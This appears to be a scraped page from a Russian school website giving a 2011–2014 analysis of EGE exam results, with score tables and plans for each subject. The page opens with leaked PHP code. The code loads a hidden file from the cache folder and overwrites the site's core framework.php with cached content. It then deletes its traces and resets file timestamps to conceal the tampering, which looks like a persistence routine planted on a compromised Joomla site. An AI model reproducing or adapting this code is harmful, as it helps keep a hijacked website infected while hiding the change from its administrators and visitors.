$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Анализ результатов государственной (итоговой) аттестации в формате ЕГЭ учащихся 11 класса за три года (2011-2014 гг)

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 299
Просмотры материалов : 218094

На сайте

Сейчас 19 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Анализ результатов государственной (итоговой) аттестации в формате ЕГЭ учащихся 11 класса за три года (2011-2014 гг)

Анализ

результатов государственной (итоговой) аттестации в формате ЕГЭ учащихся

 11 класса за три года

В течении 3 лет  в  МБОУ  «Сагарчинская СОШ» в итоговой аттестации  в форме ЕГЭ приняли участие учащиеся  11-х  классов-32 участника.  Все успешно закончили школу и получили документ об образовании.

Количество участников ЕГЭ 2011-2014гг.

ПРЕДМЕТЫ

2011-2012

2012-2013

2013-1014

 

Русский язык

10

6

16

Математика

10

6

16

История

2

 

4

Обществознание

9

4

12

Биология

   

2

 

География

4

 

2

 

Физика

1

 

6

 

Литература

   

1

 

 

                             Сравнительный анализ результатов ЕГЭ

         Результаты ЕГЭ (средний балл) в сравнении за 3 года(2011-2014гг)

п/п

 предметы

2011-2012

2012-2013

2013-2014

1

русский язык

65,7

67,3

62,3

2

математика

49,4

34,6

44,5

3

физика

46,7

 

39,1

4

биология

-

 

45

5

история

75

 

46

6

обществознание

59,9

51,5

52,8

7

география

56

 

53.5

           Из сравнительной таблицы  мы видим, что выбор предметов для сдачи ЕГЭ учащиеся определяют по своему мнению и ориентировки для дальнейшего поступления в различные  ОУ для дальнейшего обучения( от  двух обязательных до 5 по выбору).

Анализ результатов ЕГЭ показывает, что с увеличением числа обучающихся  средний балл  по предметам  понижается.

 Средний балл  по школе в 2013-2014 учебном году по предмету география на уровне муниципалитета. При выборе предметов для сдачи ЕГЭ за многие годы впервые выбран предмет литература, её средний балл выше результата по муниципалитету. Но ниже на 1,1 региона. По остальным предметам наблюдается  средний балл ниже муниципалитета и региона.

Сравнительные результаты среднего балла по школе, району, региону.

 

География

Литература

Русский язык

Физика

Математика

История

Биология

Обществознание

Мин.балл

Набранные       баллы

Мин.балл

Набранные       баллы

Мин.балл

Набранные       баллы

Мин.балл

Набранные баллы

Мин.балл

Набранные       баллы

Мин.балл

Набранные       баллы

Мин.балл

Набранные       баллы

Мин.балл

Набранные баллы

                               

Средний балл по школе

 37

53,5

32 

59

 24

62,3

 36

39,1

 20

44,5

 32

46

 36

45

 39

52,8

Средний балл по району

 

53,5

 

53

 

63,8

 

44,6

 

47,3

 

56,4

 

59,8

 

57,3

Средний балл по региону

 

63,9

 

60,1

 

68,2

 

50,2

 

48,4

 

57,2

 

60,7

 

59,8

                                     

Рейтинг самых высоких баллов за три года

Предметы

Учебный год

2011-2012

2012-2013

2013-2014

Русский язык

82

84

82

Математика

60

40

59

История

79

-

60

Обществознание

67

58

50

Биология

-

-

30

География

52

-

68

Физика

44

-

45

Литература

-

-

59

                                                  

    Как видно из данной таблицы  по  результаты ЕГЭ по предметам  в  школе, в школе имеются учащиеся со средним и высокими результатами.

  Этому предшествовала серьезная подготовка: в течение года проводились и подробно анализировались все  работы, отмечались наиболее серьезные пробелы в знаниях. Параллельно велась серьезная разъяснительная работа с учащимися и их родителями учителем, классным руководителем, администрацией. Факторы, которые положительно повлияли на результативность ЕГЭ:

  -  мотивация учащихся, заинтересованность  в получении высоких результатов ЕГЭ;

 Русский язык.

Подробный анализ показал, что есть проблемы:

-         пробелы в  подготовке экзаменуемых;

-         остаются недостаточно усвоенными разделы морфологии,  результаты экзамена выявили проблемы связанные с интерпретацией содержания текста, комментарием проблематики текста, соблюдением речевых норм;

-         недостаточно развитые навыки аналитической работы со словом и текстом;

-         в сочинениях встречаются существенные нарушения логики развития мысли, смысловой цельности, речевой связности и последовательности изложения.

В следующем  учебном году необходимо:

-         обсудить аналитические материалы по результатам ЕГЭ на заседании ШМО гуманитарного цикла;

-         учителям русского языка регулярно проводить тестовый контроль для того, чтобы учащиеся могли овладеть техникой работы с тестами и могли работать в формате ЕГЭ (начиная с 5-го класса);

-         отрабатывать умения и навыки, связанные с чтением, с информационной переработкой текста. Создавать благоприятные условия для формирования коммуникативной компетенции: больше работать с текстом, обучать анализу текста, интерпретации и созданию текстов различных стилей и жанров;

-         комплексно использовать работу над сочинениями и изложениями для автоматизации орфографических и пунктуационных навыков

Математика

Просматривается рост результатов учащихся, что явилось результатом подготовки учащихся в течении года,  работу с КИМами, организацию дополнительных занятий учителем математики .Однако показатели остаются на низком уровне.

-         в знаниях выпускников обнаруживаются пробелы даже по освоение школьниками  отдельных тем (материал выполнения заданий «В»), в том числе  по основной  школе;

-          продолжает формально усваиваться теоретическое содержание математики. Школьники затрудняются применять полученные теоретические знания в конкретно заданной ситуации, которая может даже незначительно отличаться от стандартной;

-         допускают элементарные вычислительные ошибки;

-         у  школьников  слабы навыки самоконтроля, что приводит к допуску ошибок на невнимание.

При подготовке  к ЕГЭ учителем  математики  Жусуповым Е.Н. особое внимание уделялось освоению базового уровня программы, использовались возможности компьютерного класса, тренировочные материалы на электронных носителях, интернет - ресурсы и т.д. Подобраны индивидуальные методики обучения,  выстроены  траектории  для организации повторения и закрепления изученного материала.

В следующем учебном году  нужно тщательнее продумать систему дифференциации занятий, в т.ч. и на базе компьютерного класса. Дополнительные занятия по подготовке к ЕГЭ не должны носить только консультативный характер, необходимо выстроить четкую программу подготовки учащихся с разным уровнем знаний.

Анализ полученных результатов ЕГЭ позволяет сделать вывод о необходимости целенаправленных усилий педагогического коллектива нашей школы по повышению качества обучения.

В следующем учебном году:

1.На заседании ШМО учителей математики необходимо проанализировать результаты ЕГЭ 2014г.,  сравнить школьные результаты с результатами экзамена по математике.; выявить  проблемы, затруднения, причины низких показателей в ЕГЭ, сравнить их с районными и краевыми показателями и определить собственный регламент работы по позитивному изменению результатов;

 усилить внимание к изучению курса геометрии; акцентировать внимание на обучение учащихся методам и приемам рассуждений,

-         проводить дополнительные занятия с учащимися, используя дифференцированный подход, учитывая способности обучаемых.

-         мотивировать учащихся на посещение межшкольных консультаций по математике;

-         использовать в работе диагностические карты учащихся.

3.Заместителю директора по УВР Захареевой Т,П,. необходимо:

  • осуществлять контроль качества преподавания  математики, контролировать посещение учителями    консультаций.

Результаты экзаменов по выбору

При этом, как и в предыдущие годы, наиболее востребованным предметом остается обществознание – 83 % выбора (70 % -в 2011г.; в прошлом году – 70%.)

Необходимо заметить, что шесть  человек  выбрали для сдачи по выбору один предмет 37,8 % от общего количества выпускников , в то время как десять  выпускников  выбрали   по два предмета, что составило 62,2% от общего количества выпускников. .  Выбор выпускниками экзаменов в форме ЕГЭ показывает, что для поступления выпускниками выбраны учебные заведения атематической и  гуманитарной направленности

Ни один учащийся в период сдачи экзаменов не отказался от сдачи предметов по выбору в форме и по материалам ЕГЭ.

 Не прошел порог успешности 1 выпускник по физике. Набрав 33 балла

( минимальный порог -36 баллов). 

       В целом результаты государственной итоговой аттестации за курс полной средней (полной) школы можно признать удовлетворительными.

Следует подчеркнуть, что результаты экзамена по выбору, не могут отражать особенности подготовки всех выпускников. Полученные результаты были прогнозируемы. Педагогический коллектив вел целенаправленную работу в течение всего учебного года с выпускниками и их родителями, настраивая на более серьезное отношение к предстоящим экзаменационным испытаниям. Однако,  итоги ЕГЭ могут дать информацию о некоторых характерных тенденциях, связанных с преподаванием отдельных  предметов, о работе учителей-предметников,  а также о типичных ошибках, которые допускают выпускники в процессе сдачи экзамена.

   Можно  констатировать, что уровень подготовки выпускников средней школы по  предметам  отличается. Это определяется различными факторами: требованиями к обязательному уровню подготовки выпускников по данному предмету,  организацией учебного процесса, особенностями контингента выпускников сдающих экзамены, контроля со стороны родителей и   отношением педагогов к своим обязанностям.

  Анализируя результаты  ЕГЭ за три года можно отследить лишь динамику по физике, обществознанию.

Подводя итоги анализа итоговой аттестации в формате ЕГЭ  отметим, что результаты у нас не высокие, поэтому исходя из вышеперечисленных проблем, коллектив школы поставил перед собой следующие задачи:

  1.  Учителям-предметникам разработать программу  подготовки учащихся к ЕГЭ, с учетом анализа за прошедший год.
  2. Учителям математики, истории  сотрудничать с опытными педагогами района.
  3. Проводить регулярную корректировку КТП, планов работы по подготовке к ЕГЭ  по результатам  диагностических и контрольных работ.
  4. Администрации школы усилить контроль за проведением уроков учителей и занятиями во второй половине дня, где проводиться подготовка к итоговой аттестации.
  5. Способствовать формированию положительных мотивационных установок у учащихся и родителей к Единому экзамену.
  6. Обращаться  за консультациями и помощью к психологам  школы.района. .